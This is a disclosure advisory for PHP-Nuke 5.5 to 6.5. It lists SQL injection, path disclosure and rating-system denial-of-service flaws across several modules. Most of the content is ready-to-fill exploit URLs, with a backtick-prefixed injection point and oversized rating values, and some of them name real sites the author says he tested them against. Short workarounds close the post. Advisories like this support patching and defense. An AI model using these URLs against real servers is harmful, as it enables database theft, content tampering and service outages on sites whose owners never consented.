|
------- Product: PHP-Nuke Vendor: Francisco Burzi Versions Vulnerable: Francisco Burzi PHP-Nuke 6.0 Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 FINAL Francisco Burzi PHP-Nuke 6.5 BETA 1 Francisco Burzi PHP-Nuke 6.5 6.5 with all patches , 6.0 with all patches. 5.5 with all patches No vulnerable: ? ------ DESCRIPTION: ------ New SQL Injections and Paths Disclosures related to the main modules. Please , look at the final ` , other sql injections don't use this but this very important for make a successful query. -------- FOUND VULNERABLE MODULES: -------- -------- - SECTIONS (NEW) -------- Type: SQL Injection and Path Disclosure ********* Exploit: http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] (NEW) - http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] (NEW) - http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY] (NEW) -------- -AVANTGO -------- Type: SQL Injection and Path disclosure. (NEW) ********* Exploit: http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY] -------- -SURVEYS (NEW) -------- Type: SQL Injection and Path disclosure. ******** Exploit: http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY] - http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY] &mode=&order=0&thold=0 -------- -DOWNLOADS -------- Type: SQL Injection and Path disclosure. (NEW) ******** Exploit: http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY] - http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD ------------- NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW) ------------- I found a denial of service possible attack in Downloads module trought rating system, Exploit: http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=? &rating=999999999999999999999999999999999999999999999999999999999999999999 99999 When the file is rated the file gets a 238,609,298.89 rating , this can be used for make a denial of service attack to the mysql server or send a very long buffer (buffer overflow, stack crashes). The mysql server puts this because there's and error with the query ( more characters in field than the allowed number of characters) if you send a buffer more long than the allowed/accepted the server be unstable and the system pick up. Exploit to SQL Injection and Denial of Service Attack: http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY] -------- - REVIEWS (NEW) -------- Type: SQL Injection and Path disclosure. ******** Exploit: http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY] -------- - WEB_LINKS -------- Type: SQL Injection (NEW) and Path disclosure.(NEW) ******** Exploit: http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY] - http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=` [YOUR QUERY]&ratetype=num - Web-Links module is affected by the DoS possible attack that i discovered and the SQL Injections and buffer overflows: Exploit: http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=? &ratinghost_name=?&rating=[DATA] [DATA] = your random data to send ( rating points and the field buffer , of course ). -------- SOLUTION: -------- - Deactivate enterelly the affected modules. - A temporal workaround for Path Disclosure is configuring in php.ini the reported error flags ( no report) but this is not very good solution ( WORKAROUND). ----- WHAT CAN BE HAPPEN? AND NOTES ----- Gain Access to phpnuke database , content changing , gain access to private info, server paths reveled. Mysql server buffer overflow,Mysql server pick up , server pick up. -NOTES- I tested it in phpnuke-espanol.org and it is vulnerable to all. I tested it in phpnuke.org and it is vulnerable on active modules affected by this ( Downloads, Surveys )( some errors aren't reported because php.ini is configured for this but the vulnerabilities are present.). ----- CONTACT INFO : --------------------------------------- Lorenzo Manuel Hernandez Garcia-Hierro --- Computer Security Analyzer --- --www.novappc.com -- PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 **********************************